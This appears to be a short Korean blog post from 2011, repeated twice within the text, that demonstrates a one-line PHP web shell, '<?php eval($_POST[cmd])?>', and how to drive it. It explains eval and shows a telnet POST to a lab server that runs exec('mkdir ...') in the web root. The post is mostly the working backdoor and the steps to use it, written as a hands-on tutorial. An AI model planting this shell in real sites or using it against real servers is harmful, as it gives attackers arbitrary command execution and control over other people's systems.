한 줄짜리 웹쉘의 사용법
O.S & Script & Programming 2011. 2. 10. 11:04 |한줄 짜리 웹쉘은 아래처럼 생겼다.
<?php eval($_POST[cmd])?>
참 실행시키고 싶은 욕망이 불러져 온다.
먼저 eval 이라는 녀석은 eval ( string code_str) 이렇게 사용이 되며,
간단하게 string code를 파라미터로 받아서 php 코드에서 명령어를 수행할 수 있는 녀석으로
생각하면 된다.
그리하여 실행해 보았다.
Webserver : 192.168.137.100:80
공격 수행 :
1. telnet 192.168.137.100 80
2. 헤더 + 한줄 + cmd=exec("mkdir MakeDirTest");
헤더 다음에 한줄은 method가 POST이므로 꼭 필요하다.
그럼 200 ok가 떨어진다
공격 수행 후 확인해 보면 정확히 MakeDirTest라는 폴더가 Web_root에 만들어 진것을 확인할 수 있다.
<?php eval($_POST[cmd])?>
참 실행시키고 싶은 욕망이 불러져 온다.
먼저 eval 이라는 녀석은 eval ( string code_str) 이렇게 사용이 되며,
간단하게 string code를 파라미터로 받아서 php 코드에서 명령어를 수행할 수 있는 녀석으로
생각하면 된다.
그리하여 실행해 보았다.
Webserver : 192.168.137.100:80
공격 수행 :
1. telnet 192.168.137.100 80
2. 헤더 + 한줄 + cmd=exec("mkdir MakeDirTest");
헤더 다음에 한줄은 method가 POST이므로 꼭 필요하다.
공격 수행 후 확인해 보면 정확히 MakeDirTest라는 폴더가 Web_root에 만들어 진것을 확인할 수 있다.
'O.S & Script & Programming' 카테고리의 다른 글
| 배치 파일 가지고 놀기 (0) | 2012.05.14 |
|---|---|
| 윈도우 부팅 순서 (0) | 2012.05.14 |
| 리눅스에서 ^m 없애기 (0) | 2011.02.10 |
| SQL Injetion을 해보자 (0) | 2011.02.10 |